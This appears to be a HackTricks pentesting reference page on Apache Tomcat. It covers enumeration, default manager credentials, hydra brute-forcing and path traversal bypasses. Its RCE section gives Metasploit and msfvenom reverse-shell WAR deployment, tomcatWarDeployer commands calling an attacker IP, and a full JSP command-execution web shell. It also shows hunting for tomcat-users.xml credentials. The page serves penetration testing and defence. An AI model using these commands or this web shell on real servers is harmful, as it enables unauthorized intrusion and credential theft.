overview.md (10651B)
1 --- 2 title: "Tomcat" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-web/tomcat/README.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/tomcat/README.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: true 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Tomcat 14 15 ## Discovery 16 17 - A standalone/default-style installation often listens on **port 8080**, but production connectors can use any port or sit behind a reverse proxy. 18 - **Common Tomcat error:** 19 20 <figure><img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28150%29.png" alt=""><figcaption></figcaption></figure> 21 22 ## Enumeration 23 24 ### **Version identification** 25 26 To find the version of Apache Tomcat, a simple command can be executed: 27 28 ```bash 29 curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat 30 ``` 31 32 This will search for the term "Tomcat" in the documentation index page, revealing the version in the title tag of the HTML response. 33 34 ### **Manager application location** 35 36 Probe for the standard **`/manager`** and **`/host-manager`** applications, while allowing for nonstandard context paths or removal. Modern default configurations do not grant remote management access merely because the application exists.<sup>[[2]](#references)[[5]](#references)</sup> 37 38 ### **Username Enumeration** 39 40 For Tomcat versions older than 6, it's possible to enumerate usernames through: 41 42 ```bash 43 msf> use auxiliary/scanner/http/tomcat_enum 44 ``` 45 46 ### **Default Credentials** 47 48 The **`/manager/html`** directory is particularly sensitive as it allows the upload and deployment of WAR files, which can lead to code execution. This directory is protected by basic HTTP authentication, with common credentials being:<sup>[[1]](#references)</sup> 49 50 - admin:admin 51 - tomcat:tomcat 52 - admin: 53 - admin:s3cr3t 54 - tomcat:s3cr3t 55 - admin:tomcat 56 57 These credentials can be tested using: 58 59 ```bash 60 msf> use auxiliary/scanner/http/tomcat_mgr_login 61 ``` 62 63 Another notable directory is **`/manager/status`**, which displays the Tomcat and OS version, aiding in vulnerability identification. 64 65 ### **Brute-force attack** 66 67 To attempt a brute force attack on the manager directory, one can use: 68 69 ```bash 70 hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html 71 ``` 72 73 Along with setting various parameters in Metasploit to target a specific host. 74 75 ## Common Vulnerabilities 76 77 ### **Password Backtrace Disclosure** 78 79 An application-specific `/auth.jsp` may expose submitted credentials in a verbose exception or backtrace. This is not a standard Tomcat endpoint; treat it as a content-discovery and error-handling check. 80 81 ### **Double URL Encoding** 82 83 In `mod_jk` versions before 1.2.23, CVE-2007-1860 allowed crafted, possibly double-encoded traversal through a prefix `JkMount` to reach protected pages.<sup>[[4]](#references)</sup> 84 85 A historical probe for the management application is: `pathTomcat/%252E%252E/manager/html`. 86 87 ### /examples 88 89 Apache Tomcat versions 4.x to 7.x include example scripts that are susceptible to information disclosure and cross-site scripting (XSS) attacks. These scripts, listed comprehensively, should be checked for unauthorized access and potential exploitation. Find [more info here](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)<sup>[[3]](#references)</sup> 90 91 - /examples/jsp/num/numguess.jsp 92 - /examples/jsp/dates/date.jsp 93 - /examples/jsp/snp/snoop.jsp 94 - /examples/jsp/error/error.html 95 - /examples/jsp/sessions/carts.html 96 - /examples/jsp/checkbox/check.html 97 - /examples/jsp/colors/colors.html 98 - /examples/jsp/cal/login.html 99 - /examples/jsp/include/include.jsp 100 - /examples/jsp/forward/forward.jsp 101 - /examples/jsp/plugin/plugin.jsp 102 - /examples/jsp/jsptoserv/jsptoservlet.jsp 103 - /examples/jsp/simpletag/foo.jsp 104 - /examples/jsp/mail/sendmail.jsp 105 - /examples/servlet/HelloWorldExample 106 - /examples/servlet/RequestInfoExample 107 - /examples/servlet/RequestHeaderExample 108 - /examples/servlet/RequestParamExample 109 - /examples/servlet/CookieExample 110 - /examples/servlet/JndiServlet 111 - /examples/servlet/SessionExample 112 - /tomcat-docs/appdev/sample/web/hello.jsp 113 114 ### **Path Traversal Exploit** 115 116 In some [**vulnerable reverse-proxy mappings**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/), path-parameter and normalization differences can expose protected Tomcat directories with a segment such as `/..;/`.<sup>[[6]](#references)</sup> 117 118 So, for example, you might be able to **access the Tomcat manager** page by accessing: `www.vulnerable.com/lalala/..;/manager/html` 119 120 **Another way** to bypass protected paths using this trick is to access `http://www.vulnerable.com/;param=value/manager/html` 121 122 ## RCE 123 124 Finally, if you have access to the Tomcat Web Application Manager, you can **upload and deploy a .war file (execute code)**. 125 126 ### Limitations 127 128 WAR deployment requires the appropriate Manager role: `manager-gui` for the HTML interface or `manager-script` for the text API used by `curl`. `manager-status` is read-only, while `admin-gui` and `admin-script` belong to the separate Host Manager application. Realm users and roles may be defined in `tomcat-users.xml`, whose path varies by installation (for example, `/usr/share/tomcat9/etc/tomcat-users.xml`).<sup>[[5]](#references)</sup> See [Post-exploitation](#post-exploitation). 129 130 ```bash 131 # tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed 132 133 # deploy under "path" context path 134 curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell" 135 136 # undeploy 137 curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell" 138 ``` 139 140 ### Metasploit 141 142 ```bash 143 use exploit/multi/http/tomcat_mgr_upload 144 msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP> 145 msf exploit(multi/http/tomcat_mgr_upload) > set rport <port> 146 msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username> 147 msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password> 148 msf exploit(multi/http/tomcat_mgr_upload) > exploit 149 ``` 150 151 ### MSFVenom Reverse Shell 152 153 1. Create the war to deploy: 154 155 ```bash 156 msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war 157 ``` 158 159 2. Upload `revshell.war` and request its deployed context (`/revshell/`). 160 161 ### Bind and reverse shell with [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer) 162 163 This may fail on older or incompatible Java runtimes. 164 165 #### Download 166 167 ```bash 168 git clone https://github.com/mgeeky/tomcatWarDeployer.git 169 ``` 170 171 #### Reverse shell 172 173 ```bash 174 ./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/ 175 ``` 176 177 #### Bind shell 178 179 ```bash 180 ./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/ 181 ``` 182 183 ### Using [Clusterd](https://github.com/hatRiot/clusterd) 184 185 ```bash 186 clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows 187 ``` 188 189 ### Manual method - Web shell 190 191 Create **index.jsp** with this [content](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp): 192 193 ```java 194 <FORM METHOD=GET ACTION='index.jsp'> 195 <INPUT name='cmd' type=text> 196 <INPUT type=submit value='Run'> 197 </FORM> 198 <%@ page import="java.io.*" %> 199 <% 200 String cmd = request.getParameter("cmd"); 201 String output = ""; 202 if(cmd != null) { 203 String s = null; 204 try { 205 Process p = Runtime.getRuntime().exec(cmd,null,null); 206 BufferedReader sI = new BufferedReader(new 207 InputStreamReader(p.getInputStream())); 208 while((s = sI.readLine()) != null) { output += s+"</br>"; } 209 } catch(IOException e) { e.printStackTrace(); } 210 } 211 %> 212 <pre><%=output %></pre> 213 ``` 214 215 ```bash 216 mkdir webshell 217 cp index.jsp webshell 218 cd webshell 219 jar -cvf ../webshell.war * 220 webshell.war is created 221 # Upload it 222 ``` 223 224 You could also install this (allows upload, download and command execution): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html) 225 226 ### Manual Method 2 227 228 Get a JSP web shell such as [this](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) and create a WAR file: 229 230 ```bash 231 wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp 232 zip -r backup.war cmd.jsp 233 # When this file is uploaded to the manager GUI, the /backup application will be added to the table. 234 # Go to: http://tomcat-site.local:8180/backup/cmd.jsp 235 ``` 236 237 ## Post-exploitation 238 239 The file-based realm commonly uses `tomcat-users.xml` to define Tomcat users and their roles. Other Realm implementations can store identities elsewhere. 240 241 ```bash 242 find / -name tomcat-users.xml 2>/dev/null 243 ``` 244 245 Example: 246 247 ```xml 248 [...] 249 <!-- 250 By default, no user is included in the "manager-gui" role required 251 to operate the "/manager/html" web application. If you wish to use this app, 252 you must define such a user - the username and password are arbitrary. 253 254 Built-in Tomcat manager roles: 255 - manager-gui - allows access to the HTML GUI and the status pages 256 - manager-script - allows access to the HTTP API and the status pages 257 - manager-jmx - allows access to the JMX proxy and the status pages 258 - manager-status - allows access to the status pages only 259 --> 260 [...] 261 <role rolename="manager-gui" /> 262 <user username="tomcat" password="tomcat" roles="manager-gui" /> 263 <role rolename="admin-gui" /> 264 <user username="admin" password="admin" roles="manager-gui,admin-gui" /> 265 ``` 266 267 ## Other Tomcat scanning tools 268 269 - [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner) 270 271 ## References 272 273 - [1] [Nexpose / Metasploitable sample scan report (HackerTarget)](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf) 274 - [2] [Pentest-Tomcat (simran-sankhala)](https://github.com/simran-sankhala/Pentest-Tomcat) 275 - [3] [Apache Tomcat example scripts information leaks (Rapid7)](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/) 276 - [4] [NVD: CVE-2007-1860 in the Tomcat JK connector](https://nvd.nist.gov/vuln/detail/CVE-2007-1860) 277 - [5] [Apache Tomcat Manager application documentation](https://tomcat.apache.org/tomcat-11.0-doc/manager-howto.html) 278 - [6] [Acunetix: Tomcat path traversal via reverse-proxy mapping](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/)